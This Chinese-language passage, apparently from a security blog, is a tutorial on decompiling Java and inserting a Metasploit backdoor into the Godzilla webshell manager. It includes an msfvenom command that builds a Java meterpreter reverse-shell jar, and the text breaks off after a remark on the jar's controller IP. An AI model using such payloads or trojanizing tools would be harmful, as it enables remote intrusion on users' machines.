给哥斯拉 webshell 管理工具加后门

来自公众号：信安之路Java 反编译是分析 Java 程序的基本手段，也是对一些 Java 程序二次开发的基本前提，可用于反编译的工具有很多，比如 JD-GUI，CRF 等，个人比较常用的是 IntelliJ IDEA 自带的反编译功能，其功能足够强大，能够完成大多数需求。本文简单介绍通过反编译 MSF 生成 java 后门和 WebShell 管理工具哥斯拉，并用最简单的方式将后门加入哥斯拉中。MSF 的 Java 后门MSF 提供了多种类型的后门，我们可以生成一个恶意的 jar 包，此处作为演示就使用最简单且没有经过加密处理的后门。msfvenom --payload="java/meterpreter/reverse_tcp" LHOST=127.0.0.1 LPORT=9999 -f jar > java_shell.jar打开的 Jar 包可以看到，其中有个 metasploit.bat，里面的 HOST 就是 MSF 控制端的 IP，这样就可以通过修改这个文件 ………………………………